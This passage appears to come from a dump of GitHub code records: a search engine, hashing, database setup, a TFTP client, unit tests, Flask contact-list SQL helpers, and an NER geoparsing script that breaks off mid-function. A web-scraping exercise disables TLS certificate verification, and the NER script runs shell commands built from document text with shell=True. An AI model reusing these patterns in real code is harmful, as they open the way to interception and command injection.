else:\n self.token_queries[tok] = key\n \n # Retrieve the Index File Name\n index_file_map = self.getIndexFileName(token_list)\n # print(index_file_map)\n \n else:\n format_data = set()\n for tok in self.token_regex.split(query):\n if tok != '':\n format_data.add(tok)\n tokens = self.tokenizer(format_data)\n \n # Stores the index file name of each token\n token_list = {}\n for tok in tokens:\n token_list[tok] = ''\n index_file_map = self.getIndexFileName(token_list)\n # print(index_file_map)\n\n # Store set of index files to be opened\n # for retrieving the posting_list/word\n index_files = set()\n for tok, file in index_file_map.items():\n index_files.add(file)\n # print(index_files)\n\n # Store which tokens to look for in each index file\n tok_in_index = {}\n for tok, file in index_file_map.items():\n if file in tok_in_index:\n tok_in_index[file].append(tok)\n else:\n tok_in_index[file] = [tok]\n # print(tok_in_index)\n\n # Retrieve the posting list for each token\n for i_file in index_files:\n filepath = self.index_path + i_file\n with open(filepath, 'r') as f:\n line = f.readline()\n while line != '':\n tok = line[:-1].split(';')[0]\n if tok in tok_in_index[i_file]:\n self.pl[tok] = line[:-1]\n line = f.readline()\n # print(self.pl)\n\n # Get the set of documents given the posting list\n self.findDocumentSet()\n\n # Score the documents\n self.ranker(0)\n self.addWordCount()\n self.ranker(1)\n\n # Find the titles for the documents\n self.findDocTitles()\n print(self.doc_titles, '\\n')\n\n end_time = time.time()\n with open(self.query_results_file, 'a') as f:\n for doc in self.doc_titles:\n string = ', '.join(doc)\n f.write(str(string)+'\\n')\n Δt = end_time-start_time\n f.write(str(Δt)+'\\n')\n f.write('\\n')\n\nif __name__ == \"__main__\":\n query_handler = QueryParser(argv=sys.argv[1:])\n query_handler.parse_queries()\n 
query_handler.run()\n","repo_name":"utkarsh-ls/Wikipedia-Search-Engine","sub_path":"phase1/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":15168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36150139557","text":"def hasher(key, length) -> int:\n if type(key).__name__ == 'int':\n if key < 0:\n key %= length\n key <<= 2 \n bin_key = bin(key)[2:]\n hash_value = sum(list(map(lambda x: (int(x)<<1) + 1, bin_key)))\n return hash_value % length \n elif type(key).__name__ == 'float':\n return (int(key) + hasher(str(key - int(key))[2:], length)) % length\n elif type(key).__name__ == 'str':\n return sum(list(map(lambda x: hasher(ord(x), length), list(key)))) % length\n elif type(key).__name__ == 'list':\n return sum(list(map(lambda x: hasher(x, length), key))) % length\n else: \n print('Unfortunately, type: {} impossible to process by hasher'.format(type(key).__name__))\n\n\ndef rehasher(old_hash, length) -> int:\n return (old_hash + 1) % length\n","repo_name":"NickLuman/HW_DB","sub_path":"Hash/hash_functions.py","file_name":"hash_functions.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15887986253","text":"import functools\nimport logging\nimport sys\n\nimport orjson\nimport psycopg2\nimport sqlalchemy.exc\nimport sqlalchemy.orm\nimport tenacity\nfrom sqlalchemy import create_engine\n\nfrom .config import Config\n\nengine = None\nsession_maker = sqlalchemy.orm.sessionmaker()\n\n# Module-global sqlalchemy session object, do not re-use in other modules.\n# This is for DB interaction that happens outside of HTTP request processing\n# context.\n_session = sqlalchemy.orm.scoped_session(session_maker)\n\n\nlog = logging.getLogger(__name__)\n\n\nlog.info(\"psycopg2.__libpq_version__: %s\", psycopg2.__libpq_version__)\n\n\n# Pick less log verbosity when\nlogfunc = log.info\nif \"pytest\" in sys.modules:\n logfunc = log.debug\n\n\ndef configure_engine(url):\n global engine, session_maker\n\n logfunc(\"create sqlalchemy DB engine\")\n engine = create_engine(\n url,\n echo=False,\n pool_pre_ping=True,\n # As of today some requests take a (too) long while to generate a\n # response for. We want to improve that fundamentally over time. Until\n # then, it of course makes sense to deliver a response even if it takes\n # a while. Sometimes, the response generation duration is dominated by\n # a database query which takes a long time until it returns. We have\n # seen the libpq statement timeout to hit in every now and then when it\n # was set to 30 seconds. Setting it to 120 seconds increases the\n # likelihood to deliver an HTTP response at all. Increasing it beyond\n # 180 s probably does not make sense if we don't also increase timeout\n # constants for the HTTP reverse proxy(s) in front of Conbench. See\n # conbench/gunicorn-conf.py. 
Related tickets and discussions:\n # https://github.com/conbench/conbench/issues/599\n # https://github.com/conbench/conbench/pull/690\n # https://docs.sqlalchemy.org/en/20/core/engines.html#use-the-connect-args-dictionary-parameter\n connect_args={\n \"options\": \"-c timezone=utc -c statement_timeout=120s\",\n # The `connect_timeout` parameter is documented in\n # https://www.postgresql.org/docs/12/libpq-connect.html\n \"connect_timeout\": 3, # unit: seconds\n },\n # This uses orjson for JSON-parsing JSONB fields from the database.\n # Anecdotal scenario seen with profiling: when loading 50000 result\n # objects from DB: psycopg2/_json.py:159 typecast_json took 2.5 s in\n # total (invoking stdblib JSONDecoder.decode 300000 times), with orjson\n # it took 0.3 s in total. No further noticeable gain with cysimdjson's\n # parser.\n json_deserializer=orjson.loads, # pylint: disable=E1101\n )\n logfunc(\"bind engine to session\")\n session_maker.configure(bind=engine)\n\n\n# compute this only once.\n@functools.cache\ndef get_tables_in_cleanup_order():\n # We need to remove rows from the many-to-many tables first to avoid\n # foreign key violations.\n\n from .entities._entity import Base as delarative_base\n\n tables = delarative_base.metadata.sorted_tables\n\n sort_by_name = [\"benchmark_result\"]\n\n tabledict = {t.name: t for t in tables}\n sorted_tables = []\n for name in sort_by_name:\n # find table with that name, destructure `tabledict`. Assume that\n # `sort_by_name` only contains known table names.\n sorted_tables.append(tabledict.pop(name))\n\n unsorted_tables = list(tabledict.values())\n\n # Stich both lists together.\n return sorted_tables + unsorted_tables\n\n\ndef empty_db_tables():\n \"\"\"\n For speeding up the test suite.\n\n Make sure that all tables are empty. A drop_all()/create_all() is a little\n slower than deleting individual table contents, especially when not using\n an in-memory database, as of the file system operations.\n \"\"\"\n if not Config.TESTING:\n log.warning(\"empty_db_tables() called in non-testing mode, skip\")\n return\n\n tables = get_tables_in_cleanup_order()\n\n for table in tables:\n _session.execute(table.delete())\n log.debug(\"deleted table: %s\", table)\n\n _session.commit()\n log.debug(\"all deletions committed: %s\", table)\n\n\ndef log_after_retry_attempt(retry_state: tenacity.RetryCallState):\n log.info(\n \"result after attempt %s for %s: %s\",\n retry_state.attempt_number,\n str(retry_state.fn),\n str(retry_state.outcome.exception()), # type: ignore[union-attr]\n )\n\n\n# `create_all()` below can fail with an `OperationalError` when the database\n# isn't yet reachable. Can happen when web app and database are launched at\n# about the same time (likely to happen only in dev environment). Apply a\n# retrying strategy.\n@tenacity.retry(\n retry=tenacity.retry_if_exception_type(sqlalchemy.exc.OperationalError),\n stop=tenacity.stop_after_attempt(50),\n wait=tenacity.wait_fixed(1),\n before=tenacity.before_log(log, logging.DEBUG),\n after=log_after_retry_attempt,\n reraise=True,\n)\ndef create_all():\n from .entities._entity import Base\n\n # Gunicorn without --preload runs create_all() in potentially multiple\n # runners. 
That's fine, and only one of them can 'win' the DB creation\n # prize.\n try:\n Base.metadata.create_all(engine)\n except (sqlalchemy.exc.IntegrityError, sqlalchemy.exc.ProgrammingError) as exc:\n # Seen in the wild:\n # sqlalchemy.exc.ProgrammingError: (psycopg2.errors.DuplicateTable) relation \"user\" already exists\n if \"already exists\" in str(exc):\n log.info(\n \"db.create_all(): ignore exception with 'already exists' in msg. \"\n \"Probably concurrent create_all() execution. Err: %s\",\n str(exc),\n )\n else:\n raise\n\n logfunc(\"create_all(engine) returned. dispose()\")\n engine.dispose()\n\n\ndef drop_all():\n from .entities._entity import Base\n\n _session.close()\n Base.metadata.drop_all(engine)\n","repo_name":"conbench/conbench","sub_path":"conbench/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"61"} +{"seq_id":"32535624217","text":"t = int(input())\nfor z in range(t):\n n,p = map(int, input().split())\n d =list(map(int,input().split()))\n vals = {}\n div = [0]*n\n flag = 0\n for i in range(n):\n if i==n-1:\n if(p%d[n-1]!=0):\n flag=1\n else:\n for j in range(i+1,n):\n if((d[j]%d[i] != 0) or (p % d[i] != 0)):\n flag = 1\n if(flag == 0):\n print(\"NO\")\n continue\n else:\n for i in range(n-1,-1,-1):\n if((p % d[i]) == 0):\n div[i] = (p // d[i]) - 1\n p = p - (div[i] * d[i])\n else:\n div[i] = (p // d[i]) + 1;\n break;\n print(\"YES\",end=' ')\n for i in div:\n print(i,end=' ')\n print()\n","repo_name":"darshanbangera/aps-2020","sub_path":"Code Library/codechef/nochange.py","file_name":"nochange.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9247866449","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport ssl\nimport re\ncount = dict()\nsum = 0\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter - ')\nhtml = urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(html, \"html.parser\")\n\n#retrieve all anchor tags\ntags = soup('span')\nfor tag in tags:\n count[tag] = count.get(tag, 0) + 1\n lines = ('Contents:', tag.contents[0])\n num = list(lines)\n y = int(num[1])\n if y > 0:\n sum = sum + y\nprint(\"count\", count)\nprint(\"sum\", sum)\n\n","repo_name":"Alishba-Bacha/Python_For_EveryBody","sub_path":"Assignment_12.1/Assignment_12.1_code.py","file_name":"Assignment_12.1_code.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13079663913","text":"import struct\nfrom socket import *\n\nipAddr = '192.168.31.12'\ndownFileName = '123456.jpg'\n\nmyRequest = struct.pack('!H10sb5sb', 1, '123456.jpg'.encode('gb2312'), 0, 'octet'.encode('gb2312'), 0) # 组包\nudpSocket = socket(AF_INET, SOCK_DGRAM)\n# udpSocket.bind(('', 7878))\nudpSocket.sendto(myRequest, (ipAddr, 69))\nnewFile = open('123456.jpg'.encode('gb2312'), 'wb')\nwhile True:\n recvfromData = udpSocket.recvfrom(1024)\n recvData,serverInfo = recvfromData # (操作号,块编码),(服务器ip,端口)\n CZnum = struct.unpack('!H', recvData[:2]) # 操作号\n moduleNum = struct.unpack('!H', recvData[2:4]) # 块编码\n if CZnum[0] == 3:\n newFile.write(recvData[4:])\n ackData = struct.pack('!HH', 4, moduleNum[0])\n udpSocket.sendto(ackData, serverInfo)\n if len(recvData) < 516:\n 
break\nnewFile.close()\nudpSocket.close()\n","repo_name":"1655490577/StudyCodes","sub_path":"OldProject/历史文件/test/tftpfile.py","file_name":"tftpfile.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"378463139","text":"class Cat:\n def __init__(self, name, color='흰색'):\n self.name = name\n self.color = color\n\n def meow(self):\n print(f'내이름은 {self.name}, 색깔은 {self.color}, 야옹 야옹')\n\n\nnabi = Cat(\"나비\",\"흰섹\")\nnabi.meow()\nnero = Cat(\"네로\",\"검은색\")\nnero.meow()\nmimi = Cat(\"미미\",\"갈색\")\nmimi.meow()","repo_name":"minjung7961/python_lecture","sub_path":"Object/init_cats.py","file_name":"init_cats.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2354760276","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n# @TIME :2019/4/30 18:19\n# @Author : 洪松\n# @File : example7_16.py\n\nimport time\nfrom example7_15 import clock\n\n\n@clock\ndef snooze(seconds):\n time.sleep(seconds)\n\n\n@clock\ndef factorial(n):\n return 1 if n < 2 else n*factorial(n-1)\n\n\nif __name__ == '__main__':\n print('*' * 40, 'Calling snooze(.123)')\n snooze(.123)\n print('*' * 40, 'Calling factorial(6)')\n print('6! =', factorial(6))\n","repo_name":"hsyy673150343/FluentPython","sub_path":"函数装饰器和闭包/example7_16.py","file_name":"example7_16.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23450203081","text":"f_in = 'A-large.in'\nf_out = 'A-large.out'\n\nf = open(f_in, 'r')\no = open(f_out, 'w')\n\nT = int(f.readline())\n\ndef main():\n with f:\n data = f.readlines()\n\n total_standing = 0\n for case_num_minus1, line in enumerate(data):\n case = line.split()\n case[0] = int(case[0]) # Maximum shyness in audience\n case[1] = [int(i) for i in case[1]] # Data: S_i of audience\n\n min_friend_needed = 0\n for Si, num_of_Si_audience in enumerate(case[1]):\n if (Si == 0) and (num_of_Si_audience > 0):\n \"\"\" Base case \"\"\"\n total_standing = num_of_Si_audience\n elif (total_standing < Si):\n min_friend_needed += 1\n total_standing += (1+num_of_Si_audience)\n else:\n total_standing += num_of_Si_audience\n\n o.write(\"Case #{0}: {1}\\n\".format(str(case_num_minus1 + 1), str(min_friend_needed)))\n total_standing = 0 # Reset (loop logic bug?)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1820.py","file_name":"1820.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33638935729","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\ngraph = [[] for _ in range(n+1)]\r\n\r\nfor _ in range(m):\r\n a, b = map(int, input().split())\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\nvisited_sum = []\r\nfor i in range(1, n+1):\r\n visited = [0] * (n + 1)\r\n d1 = deque()\r\n d1.append(i)\r\n visited[i] = 1\r\n\r\n while True:\r\n if not d1:\r\n break\r\n\r\n tmp = d1.popleft()\r\n\r\n for j in graph[tmp]:\r\n if not visited[j]:\r\n visited[j] = visited[tmp] + 1\r\n d1.append(j)\r\n visited_sum.append(sum(visited))\r\nprint(visited_sum.index(min(visited_sum)) + 1)\r\n\r\n","repo_name":"tfer2442/myAlgorithm","sub_path":"백준/Silver/1389. 
케빈 베이컨의 6단계 법칙/케빈 베이컨의 6단계 법칙.py","file_name":"케빈 베이컨의 6단계 법칙.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23635651681","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n\nclass SpeakingInTongues(object):\n \n SAMPLES = [\n (\"ejp mysljylc kd kxveddknmc re jsicpdrysi\",\n \"our language is impossible to understand\"),\n (\"rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd\",\n \"there are twenty six factorial possibilities\"),\n (\"de kr kd eoya kw aej tysr re ujdr lkgc jv\",\n \"so it is okay if you want to just give up\")\n ]\n\n def __init__(self):\n self.map = {\"z\": \"q\", \"q\": \"z\"}\n for s1, s2 in self.SAMPLES:\n for i in xrange(len(s1)):\n if s1[i] in self.map:\n assert(self.map[s1[i]] == s2[i])\n self.map[s1[i]] = s2[i] \n\n def sol(self, text):\n return \"\".join(map(lambda c: self.map[c], text))\n\ndef test_cases(input):\n fi = open(input, \"r\")\n T = int(fi.next())\n for i in xrange(1, T + 1):\n yield i, fi.next().strip()\n fi.close()\n\ndef main(input, output):\n fo = open(output, \"w\")\n problem = SpeakingInTongues()\n for i, text in test_cases(input):\n result = problem.sol(text)\n fo.write(\"Case #{0}: {1}\\n\".format(i, result)) \n fo.close()\n \nif __name__ == \"__main__\":\n # Parse command options\n from optparse import OptionParser\n parser = OptionParser(usage=\"Usage: %prog [options] param1 param2\") \n parser.add_option(\"-i\", \"--input\", dest=\"input\", help=\"Input file\")\n parser.add_option(\"-o\", \"--output\", dest=\"output\", help=\"Output file\")\n options, args = parser.parse_args()\n main(options.input, options.output)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/517.py","file_name":"517.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71221401154","text":"import unittest\n\nfrom src.room import Room\nfrom src.song import Song\nfrom src.guest import Guest\n\nclass TestRoom(unittest.TestCase):\n def setUp(self):\n self.empty_room = Room(0, 0, 0, [])\n self.room1 = Room(3, 5, 15, [])\n self.playlist1 = [\n Song(\"My Immortal\", \"Evanescence\"),\n Song(\"I Cant Dance\", \"Genesis\"),\n Song(\"Icky Thump\", \"The White Stripes\"),\n Song(\"Howlin For You\", \"The Black Keys\"),\n Song(\"Galvanize\", \"Chemical Brothers\"),\n Song(\"Breaking The Habit\", \"Linkin Park\"),\n Song(\"Legendary\", \" Welshly Arms\"),\n Song(\"Stone Cold Classics\", \"AKA George\"),\n Song(\"Back To Black\", \"Amy Winehouse\")\n ]\n self.guests = [\n Guest(\"Sheldon\", 80, \"At Last\"),\n Guest(\"Amy\", 90, \"On The Beach\"),\n Guest(\"Leonard\", 90, \"Galvanize\")\n ]\n\n def test_room_has_number(self):\n self.assertEqual(3, self.room1.number)\n \n def test_room_has_capacity(self):\n self.assertEqual(5, self.room1.capacity)\n \n def test_room_has_entry_fee(self):\n self.assertEqual(15, self.room1.entry_fee)\n \n def test_open_room(self):\n self.empty_room.open_room(3, 5 , 15, self.playlist1)\n self.assertEqual(self.room1.number, self.empty_room.number)\n self.assertEqual(self.room1.capacity, self.empty_room.capacity)\n self.assertEqual(self.room1.entry_fee, self.empty_room.entry_fee)\n self.assertEqual(self.playlist1, self.empty_room.playlist)\n \n def test_check_availability_true(self):\n self.assertEqual(True, self.room1.check_availability(self.room1, 3))\n \n \n def 
test_check_availability_false(self):\n self.assertEqual(False, self.empty_room.check_availability(self.empty_room, 3))\n self.assertEqual(False, self.room1.check_availability(self.room1, 6))\n \n def test_check_in(self):\n self.room1.check_in(self.room1 ,self.guests)\n self.assertEqual(2, self.room1.capacity)\n self.assertEqual(65, self.guests[0].wallet)\n self.assertEqual(75, self.guests[2].wallet)\n \n def test_check_out(self):\n self.room1.check_out(self.room1, self.guests)\n self.assertEqual(8, self.room1.capacity)\n \n def test_check_in_and_out(self):\n self.room1.check_in(self.room1, self.guests)\n self.assertEqual(2, self.room1.capacity)\n self.room1.check_out(self.room1, self.guests)\n self.assertEqual(5, self.room1.capacity)\n \n def test_take_payment(self):\n self.room1.take_payment(self.room1, self.guests)\n self.assertEqual(65, self.guests[0].wallet)\n self.assertEqual(75, self.guests[2].wallet)\n \n def test_guest_fav_song(self):\n self.room1.open_room(3, 5 , 15, self.playlist1)\n self.room1.check_in(self.room1 ,self.guests)\n self.assertEqual(True, self.room1.guest_fav_song(self.room1, self.guests))\n self.assertEqual(\"Whoo!\", self.room1.check_in(self.room1, self.guests))\n \n ","repo_name":"Cetins/karaoke_bar","sub_path":"tests/room_test.py","file_name":"room_test.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29081769193","text":"from flask import Flask\nfrom flask.json import jsonify\n\ndef getContactLists(cursor, userID):\n table = cursor.execute(\"SELECT * FROM contact_lists WHERE user_id=%s\", (str(userID)))\n contactLists = []\n for entry in table:\n count = 0\n contacts = cursor.execute(\"SELECT * FROM contact_lists WHERE contact_list_id=%s\", (str(entry[0])))\n for contact in contacts:\n count = count + 1\n contactLists.append({\"id\": entry[0], \"name\": entry[2], \"count\": count}) #return contact id, name, and contacts\n return contactLists\n\n\n\"\"\"\nAdds a contact list to the database. 
The contact list will be registered under a specific user through userID, and have a name which is contactListName\n\"\"\"\ndef addContactList(cursor, userID, contactListName):\n contact_lists = cursor.execute(\"SELECT * FROM contact_lists WHERE contact_list_name=%s\", contactListName)\n\n for contact_list in contact_lists: # there should be no duplicates\n return {'result': '-1'}\n\n cursor.execute(\"INSERT INTO contact_lists (user_id, contact_list_name) VALUES (%s, %s)\", (int(userID), contactListName))\n\n ids = cursor.execute(\"SELECT contact_list_id FROM contact_lists WHERE contact_list_name=%s\", contactListName)\n for id in ids:\n return {'result': id[0]}\n\n return {'result': '-1'} # should not happen\n\ndef updateContactListName(cursor, contactListID, contactListName):\n cursor.execute(\"UPDATE contact_lists SET contact_list_name = %s WHERE contact_list_id = %s\", (contactListName, int(contactListID)))\n\n\"\"\"\nGiven a contact list id, deletes all contacts in that contact list and the list itself\n\nthis action will remove all contacts associated with the contact list and the contact list itself\nin addition, any survey that was previously linked to the contact list being deleted will be linked to a null contact list (-1)\n\"\"\"\ndef deleteContactList(cursor, contactListID):\n # all of the surveys that point to this contact list need to be set to reference contact list -1 now\n cursor.execute(\"UPDATE surveys SET contact_list_id = -1 WHERE contact_list_id = %s\", (int(contactListID)))\n\n # delete all contacts in the contact list\n cursor.execute(\"DELETE FROM contacts WHERE contact_list_id = %s\", (int(contactListID)))\n\n # delete the contact list itself\n cursor.execute(\"DELETE FROM contact_lists WHERE contact_list_id = %s\", (int(contactListID)))\n\ndef getContacts(cursor, contactListID):\n table = cursor.execute(\"SELECT * FROM contacts WHERE contact_list_id=%s\", (str(contactListID)))\n contacts = []\n for entry in table:\n contacts.append({\"first name\": entry[2], \"last name\": entry[3], \"email address\": entry[4]})\n return contacts\n\ndef addContact(cursor, contactListID, firstName, lastName, emailAddress):\n table = cursor.execute(\"SELECT * FROM contacts WHERE contact_list_id=%s\", (int(contactListID)))\n for entry in table:\n if entry[4] == emailAddress:\n return jsonify({'result': '-1'}) # duplicate email address not allowed\n cursor.execute(\"INSERT INTO contacts (contact_list_id, first_name, last_name, email_address) VALUES(%s, %s, %s, %s)\", (int(contactListID), firstName, lastName, emailAddress))\n\n contact_ids = cursor.execute(\"SELECT contact_id FROM contacts WHERE email_address=%s\", emailAddress)\n for id in contact_ids:\n return {'result': id[0]}\n\n return {'result': \"-1\"}\n\n\"\"\"\nUpdates the first name of a contact using the contact id provided\n\"\"\"\ndef updateContactFirstName(cursor, contactID, firstName):\n cursor.execute(\"UPDATE contacts SET first_name = %s WHERE contact_id = %s\", (firstName, int(contactID)))\n\n\"\"\"\nUpdates the last name of a contact using the contact id provided\n\"\"\"\ndef updateContactLastName(cursor, contactID, lastName):\n cursor.execute(\"UPDATE contacts SET last_name = %s WHERE contact_id = %s\", (lastName, int(contactID)))\n\n\"\"\"\nUpdates the email address of a contact using the contact id provided\n\"\"\"\ndef updateContactEmailAddress(cursor, contactID, emailAddress):\n cursor.execute(\"UPDATE contacts SET email_address = %s WHERE contact_id = %s\", (emailAddress, int(contactID)))\n\n\n\"\"\"\ndeletes 
a contact from a contact list of the specified id\n\"\"\"\ndef deleteContact(cursor, contactID):\n    cursor.execute(\"DELETE FROM contacts WHERE contact_id = %s\", (int(contactID)))\n\n\"\"\"\nGiven a user ID belonging to a user, return all the contact list information associated with the user.\nEach contact list entry will have contact information nested inside in a single JSON response\n\"\"\"\ndef getContactInfoDataStructure(cursor, userID):\n    contactListsTable = cursor.execute(\"SELECT * FROM contact_lists WHERE user_id=%s\", (str(userID)))\n    contactLists = []\n    for contactList in contactListsTable:\n        contacts_ary = []\n        contacts = cursor.execute(\"SELECT * FROM contacts WHERE contact_list_id=%s\",(str(contactList[0])))\n        size = 0\n        for contact in contacts:\n            contacts_ary.append({\"id\": contact[0], \"first_name\": contact[2], \"last_name\": contact[3], \"email\": contact[4]}) #return contact id, first name, last name, email address\n            size += 1\n        contactLists.append({'contact_list_id': contactList[0], 'user_id': contactList[1], 'contact_list_name': contactList[2], 'contacts': contacts_ary, 'size': size})\n    return contactLists\n","repo_name":"Feedback-Friend/Web-Application","sub_path":"src/backend/contacts.py","file_name":"contacts.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74623593474","text":"import subprocess\nimport requests\nimport spacy\nimport sys\nimport json\nimport os\nimport glob\nimport geocoder\nfrom fuzzywuzzy import process, fuzz\nfrom sklearn.cluster import AgglomerativeClustering\nimport numpy as np\n\nACCEPTED_TAGS = [\"GPE\", \"LOC\"]\nCMD_TEMPLATE = \"./runGeoParse.sh\"\nGEONAME_URL = \"http://api.geonames.org/hierarchyJSON?geonameId={}&username=ngds_adept&style=full\"\nFUZZY_SIMILARITY_THRESHOLD = 0.85\nNUM_CLUSTERS_PERCENT = 0.2\nLOCATION_SIZE_THRESHOLD = 0.75\nDEBUG = False\nif \"DEBUG\" in os.environ:\n    if os.environ[\"DEBUG\"].lower() == \"true\":\n        DEBUG = True\n\n\"\"\"\nTEMPORARY NOTES:\n\nCurrently: given the entities in a document:\n    1. will fuzzy string match the geoparse results and filter out the strings\n    that aren't close to the original term.\n    2. requests hierarchy of each remaining location (results from geoparse)\n    3. clusters the locations based on their continent and filters all but the\n    largest continents (hit based, not size)\n    4. clusters the locations based on their country and filters all but the\n    largest countries (hit based, not size)\n    5. clusters remaining results based on physical location\n    6. for each (remaining) entity that was found in the document, choose\n    geoparse result that belongs to the largest cluster, then remove\n    all other occurrences before checking for the next result\n\n\nTODO:\n    1. for the US, bring filtering down to the state level\n    2. do something different with multiword queries -- match each individual word?\n    3. get some benchmark results\n    4. 
write up for Andrew\n\n\n\"\"\"\n\n\nclass NER:\n\n def debug(self, msg):\n if DEBUG: print(f\"[DEBUG] {msg}\\n\")\n\n def __init__(self, files_location: str, output_path: str):\n self.nlp = spacy.load(\"en_core_web_trf\")\n self.files_location = files_location\n self.output_path = output_path\n self.load_docs()\n document_entities = self.tag_entities()\n self.run_geonorm(document_entities)\n\n def load_docs(self):\n print(\"Loading docs...\")\n self.txt_docs = {}\n for file in os.listdir(self.files_location):\n if file.endswith(\".txt\") or file.endswith(\"text\"):\n f = open(self.files_location + file, \"r\", encoding=\"utf8\")\n self.txt_docs[file] = '\\n'.join(f.readlines())\n f.close()\n self.debug(\"file contents: \" + str(self.txt_docs[file]))\n print(\"Docs loaded.\")\n\n \"\"\"\n Collects all of the entities for each doc and stores in a dictionary\n returns: a dictionary mapping the document name to a list of strings (the entities)\n \"\"\"\n\n def tag_entities(self):\n # {doc1: [ent11, ent12, ...], doc2: [ent21, ent22, ..], ...}\n documents = {}\n for docname in self.txt_docs.keys():\n print(f\"Tagging {docname}...\")\n doc = self.txt_docs[docname]\n spacy_doc = self.nlp(doc)\n # Entities for the current document\n entities = []\n for ent in spacy_doc.ents:\n if ent.label_ not in ACCEPTED_TAGS:\n continue\n entities.append(ent.text)\n documents[docname] = entities\n self.debug(f\"\\tFound {len(entities)} entities in the document\")\n print(\"Done tagging documents\")\n return documents\n\n def run_geonorm(self, documents):\n self.debug(\"Running geoparse\")\n for docname in documents.keys():\n if len(documents[docname]) == 0:\n continue\n basename = os.path.splitext(os.path.basename(docname))[0]\n multiword = {}\n cmd = [CMD_TEMPLATE]\n # Creats the cmd so it is ./runGeoParse.sh \"ent1\" \"ent2\" ...\n for ent in documents[docname]:\n cmd.append(f\"\\\"{ent}\\\"\")\n \"\"\"\n if len(ent.split()) > 1:\n multiword[ent] = geocoder.geonames(ent, key=\"geonorm_rerank\")\n print(multiword)\n else:\n cmd.append(f\"\\\"{ent}\\\"\")\n \"\"\"\n pipe = subprocess.run(\" \".join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\n with open(f\"{self.output_path}/{basename}_geoparse_output.txt\", 'w+', encoding='utf8') as f:\n f.write(pipe.stdout.decode('utf-8'))\n\n for tf in glob.glob(\"/tmp/geoparse*/*\"):\n os.remove(tf)\n reranked = self.rerank_results(pipe.stdout.decode('utf-8'))\n\n self.debug(\"Saving reranked_results - (location, geoname_id)\")\n with open(f\"{self.output_path}/{basename}_reranked_results.txt\", \"w+\", encoding=\"utf8\") as f:\n f.write(str(reranked))\n\n results_dict = {}\n document_results = []\n ent_idx = 0\n for location in reranked.keys():\n geoparse_results = reranked[location]\n for result in geoparse_results:\n self.debug(f\"Getting hierarchy of {result[0]} which was returned for {location} - {result[1]}\")\n # TODO: speed up runtime by running this in multiple threads, this is mainly just lots of\n # external IO waiting\n result_dict = self.get_geoname_hierarchy(result[1])\n if result_dict is not None:\n result_dict[\"NAME\"] = result[0]\n result_dict[\"ENTITY\"] = location\n result_dict[\"GROUP\"] = ent_idx\n # result_dict has ID,CONT,PCLI,LAT,LNG,NAME,GROUP of the geoparse result\n document_results.append(result_dict)\n ent_idx += 1\n\n self.debug(\"Saving result_dict - [{{ID:~,CONT:~...}},...]\")\n with open(f\"{self.output_path}/{basename}_result_dict.txt\", \"w+\", encoding=\"utf8\") as f:\n f.write(str(document_results))\n\n # 
document_results = [{ID:~,CONT:~,PCLI:~,LAT:~,LNG:~,NAME:~,GROUP:~}, {ID:~,...}, ...]\n            document_results = self.remove_region_outliers(document_results, \"CONT\")\n            document_results = self.remove_region_outliers(document_results, \"PCLI\")\n\n            X = []\n            for result in document_results:\n                coord = [float(result[\"LAT\"]), float(result[\"LNG\"])]\n                X.append(coord)\n\n            clusters = self.cluster_locations(np.array(X))\n            if clusters is None:\n                print(\"Couldn't find clusters in this document! Skipping.\")\n                continue\n            self.decide_final_results(document_results, clusters, ent_idx, basename)\n\n    \"\"\"\n    n_groups: the number of entities found in the document that remain\n    \"\"\"\n\n    def decide_final_results(self, document_results, clusters, n_groups, basename):\n        final_document_results = []\n        self.debug(\"Filtering final clusters\")\n        cluster_sizes = self.get_cluster_sizes(clusters)\n        self.debug(f\"cluster_sizes: {str(cluster_sizes)}\")\n        max_groups = [None] * n_groups\n        # add the cluster to the document results\n        for i in range(len(document_results)):\n            